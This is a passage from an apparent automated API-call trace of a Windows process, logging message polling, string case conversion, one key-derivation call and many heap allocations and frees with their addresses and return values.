wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.332] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0159.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.332] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0159.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.332] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0159.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.332] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa55e0) returned 1 [0159.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0159.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0159.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0159.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0159.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0159.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0159.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0159.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0159.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0159.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0159.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0159.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0159.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0159.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0159.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0159.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0159.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0159.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0159.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0159.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0159.338] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0159.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0159.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0159.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0159.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0159.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0159.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0159.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0159.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0159.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0159.341] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0159.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0159.341] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0159.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0159.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.341] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0159.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0159.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0159.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.342] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0159.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.342] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0159.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0159.342] 